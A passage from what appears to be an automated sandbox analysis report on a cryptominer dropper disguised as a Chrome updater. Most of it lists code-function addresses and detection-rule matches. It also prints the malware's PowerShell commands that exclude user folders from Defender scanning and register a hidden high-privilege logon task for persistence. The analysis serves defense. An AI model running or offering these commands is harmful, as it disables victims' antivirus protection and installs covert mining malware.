                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF4B23C11_2_000001C6CEF4B23C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F820DC12_2_0000025304F820DC
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F8B03012_2_0000025304F8B030
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F9165812_2_0000025304F91658
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F8B23C12_2_0000025304F8B23C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F8F2F812_2_0000025304F8F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FB2CDC12_2_0000025304FB2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBBC3012_2_0000025304FBBC30
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FC225812_2_0000025304FC2258
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBBE3C12_2_0000025304FBBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBFEF812_2_0000025304FBFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2113B03013_2_0000016C2113B030
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211320DC13_2_0000016C211320DC
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2113F2F813_2_0000016C2113F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2113B23C13_2_0000016C2113B23C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2114165813_2_0000016C21141658
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116BC3013_2_0000016C2116BC30
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C21162CDC13_2_0000016C21162CDC
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116FEF813_2_0000016C2116FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116BE3C13_2_0000016C2116BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2117225813_2_0000016C21172258
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CBC3013_2_0000016C211CBC30
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211C2CDC13_2_0000016C211C2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CFEF813_2_0000016C211CFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CBE3C13_2_0000016C211CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211D225813_2_0000016C211D2258
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BDB03014_2_0000026F47BDB030
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BDF2F814_2_0000026F47BDF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BDB23C14_2_0000026F47BDB23C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BE165814_2_0000026F47BE1658
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BD20DC14_2_0000026F47BD20DC
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F48142CDC14_2_0000026F48142CDC
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814BE3C14_2_0000026F4814BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4815225814_2_0000026F48152258
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814FEF814_2_0000026F4814FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814BC3014_2_0000026F4814BC30
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DD20DC15_2_0000029B91DD20DC
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DDB03015_2_0000029B91DDB030
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DDF2F815_2_0000029B91DDF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DE165815_2_0000029B91DE1658
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DDB23C15_2_0000029B91DDB23C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9235225815_2_0000029B92352258
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234BE3C15_2_0000029B9234BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234FEF815_2_0000029B9234FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234BC3015_2_0000029B9234BC30
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B92342CDC15_2_0000029B92342CDC
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923B225815_2_0000029B923B2258
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923ABE3C15_2_0000029B923ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923AFEF815_2_0000029B923AFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923ABC3015_2_0000029B923ABC30
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923A2CDC15_2_0000029B923A2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AABC3016_2_0000020422AABC30
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AA2CDC16_2_0000020422AA2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AABE3C16_2_0000020422AABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AB225816_2_0000020422AB2258
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AAFEF816_2_0000020422AAFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BBE3C17_2_00000206287BBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287C225817_2_00000206287C2258
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BFEF817_2_00000206287BFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BBC3017_2_00000206287BBC30
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287B2CDC17_2_00000206287B2CDC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847125B23C20_2_000002847125B23C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847126165820_2_0000028471261658
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847125F2F820_2_000002847125F2F8
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847125B03020_2_000002847125B030
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_00000284712520DC20_2_00000284712520DC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139BE3C20_2_000002847139BE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_00000284713A225820_2_00000284713A2258
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139FEF820_2_000002847139FEF8
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139BC3020_2_000002847139BC30
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_0000028471392CDC20_2_0000028471392CDC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847197F2F820_2_000002847197F2F8
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847197B23C20_2_000002847197B23C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847198165820_2_0000028471981658
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_00000284719720DC20_2_00000284719720DC
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847197B03020_2_000002847197B030
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000182924DB03021_2_00000182924DB030
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000182924D20DC21_2_00000182924D20DC
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000182924DB23C21_2_00000182924DB23C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000182924E165821_2_00000182924E1658
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000182924DF2F821_2_00000182924DF2F8
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254BC3021_2_000001829254BC30
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_0000018292542CDC21_2_0000018292542CDC
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254BE3C21_2_000001829254BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829255225821_2_0000018292552258
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254FEF821_2_000001829254FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6BC3024_2_000001BB3DA6BC30
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6FEF824_2_000001BB3DA6FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6BE3C24_2_000001BB3DA6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA7225824_2_000001BB3DA72258
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA62CDC24_2_000001BB3DA62CDC
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4BC3025_2_0000029ABCF4BC30
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF42CDC25_2_0000029ABCF42CDC
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF5225825_2_0000029ABCF52258
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4BE3C25_2_0000029ABCF4BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4FEF825_2_0000029ABCF4FEF8
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF6101914E426_2_00007FF6101914E4
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF61019232826_2_00007FF610192328
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF610191DB426_2_00007FF610191DB4
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF6101926E826_2_00007FF6101926E8
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DAB03028_2_0000025E81DAB030
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DAF2F828_2_0000025E81DAF2F8
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DAB23C28_2_0000025E81DAB23C
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DB165828_2_0000025E81DB1658
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DA20DC28_2_0000025E81DA20DC
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDBC3028_2_0000025E81DDBC30
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDFEF828_2_0000025E81DDFEF8
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDBE3C28_2_0000025E81DDBE3C
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DE225828_2_0000025E81DE2258
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DD2CDC28_2_0000025E81DD2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD5F2F829_2_000001CD9AD5F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD5B23C29_2_000001CD9AD5B23C
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD6165829_2_000001CD9AD61658
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD520DC29_2_000001CD9AD520DC
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD5B03029_2_000001CD9AD5B030
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8FEF829_2_000001CD9AD8FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8BE3C29_2_000001CD9AD8BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD9225829_2_000001CD9AD92258
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD82CDC29_2_000001CD9AD82CDC
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8BC3029_2_000001CD9AD8BC30
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C3620DC31_2_000002AF8C3620DC
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C36B23C31_2_000002AF8C36B23C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C37165831_2_000002AF8C371658
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C36F2F831_2_000002AF8C36F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C36B03031_2_000002AF8C36B030
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C392CDC31_2_000002AF8C392CDC
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39BE3C31_2_000002AF8C39BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C3A225831_2_000002AF8C3A2258
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39FEF831_2_000002AF8C39FEF8
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39BC3031_2_000002AF8C39BC30
                Source: h2qWqtD73F.exeStatic PE information: Number of sections : 11 > 10
                Source: updater.exe.0.drStatic PE information: Number of sections : 11 > 10
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@22/79@0/0
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,5_2_00007FF67E6C2328
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF610192328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,26_2_00007FF610192328
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,5_2_00007FF67E6C1AC4
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C2328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,5_2_00007FF67E6C2328
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeFile created: C:\Users\user\AppData\Roaming\GoogleJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeFile created: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmpJump to behavior
                Source: h2qWqtD73F.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: h2qWqtD73F.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeFile read: C:\Users\user\Desktop\h2qWqtD73F.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\h2qWqtD73F.exe "C:\Users\user\Desktop\h2qWqtD73F.exe"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
